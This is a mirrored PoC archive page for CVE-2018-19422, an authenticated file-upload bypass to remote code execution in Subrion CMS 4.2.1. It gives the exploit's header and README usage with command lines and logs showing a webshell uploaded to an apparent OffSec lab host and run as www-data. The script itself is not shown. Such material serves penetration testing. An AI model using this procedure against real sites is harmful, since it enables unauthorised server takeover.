Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2018-19422 PoC — Subrion CMS 安全漏洞

Source
https://github.com/Drew-Alleman/CVE-2018-19422
Associated Vulnerability
Title:Subrion CMS 安全漏洞 (CVE-2018-19422)
Description:Subrion CMS是Subrion团队开发的一套基于PHP的内容管理系统(CMS)。该系统可被集成到网站,并支持多种扩展插件等。 Subrion CMS 4.2.1版本中的/panel/uploads存在安全漏洞,该漏洞源于.htaccess文件没有禁止对pht和phar文件的执行操作。远程攻击者可借助.pht或.phar文件利用该漏洞执行任意的PHP代码。
Description
Subrion File Upload Bypass to RCE and Custom File Upload (Authenticated)
Readme
# CVE-2018-19422
```
# Exploit Title: File Upload Bypass to RCE (Authenticated)
# Google Dork: N/A
# Date: 17/05/2021
# Exploit Author: Drew Alleman
# Based on an exploit written by: Fellipe Oliveira
# Vendor Homepage: https://subrion.org/
# Software Link: https://github.com/intelliants/subrion
# Version: SubrionCMS 4.2.1
# Tested on: Debian9, Debian 10 and Ubuntu 16.04
# CVE : CVE-2018-19422

# Exploit Requirements: BeautifulSoup library
# https://github.com/intelliants/subrion/issues/801
```


# Usage
## Basic RCE
```
$ python3 CVE-2018-19422.py -u http://exfiltrated.offsec/ -l admin -p admin
2025-04-03 19:23:36,723 [INFO] Connecting to login page: http://exfiltrated.offsec/panel/
2025-04-03 19:23:36,951 [INFO] CSRF token acquired: 0FaEOZZnQvcrmV6eS7LahriwTaO8rQpXvqpnHPCE
2025-04-03 19:23:36,951 [INFO] Attempting login to endpoint: http://exfiltrated.offsec/panel/ with credentials admin:admin
2025-04-03 19:23:48,533 [INFO] Login Successful!
2025-04-03 19:23:48,533 [INFO] Uploading default webshell...
2025-04-03 19:23:48,741 [INFO] Successfully uploaded file http://exfiltrated.offsec/uploads/opigcodbctnb.phar with 30 bytes of data
2025-04-03 19:23:48,905 [INFO] Webshell is live: http://exfiltrated.offsec/uploads/opigcodbctnb.phar
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

## File Upload
```
$ python3 CVE-2018-19422.py -u http://exfiltrated.offsec/ -l admin -p admin --file ~/Downloads/ak47shell.php
2025-04-03 19:24:44,584 [INFO] Connecting to login page: http://exfiltrated.offsec/panel/
2025-04-03 19:24:44,757 [INFO] CSRF token acquired: 8b5kPv3umnEQTzdwMnPwTDFifxJ1isKKB6lIiInF
2025-04-03 19:24:44,757 [INFO] Attempting login to endpoint: http://exfiltrated.offsec/panel/ with credentials admin:admin
2025-04-03 19:24:57,199 [INFO] Login Successful!
2025-04-03 19:24:57,547 [INFO] Successfully uploaded file http://exfiltrated.offsec/uploads/ak47shell.phar with 57249 bytes of data
```
File Snapshot

 [4.0K]  /data/pocs/80ca9aff737b21eb90137a25017ad67600c69a76
├── [9.9K]  CVE-2018-19422.py
└── [1.9K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.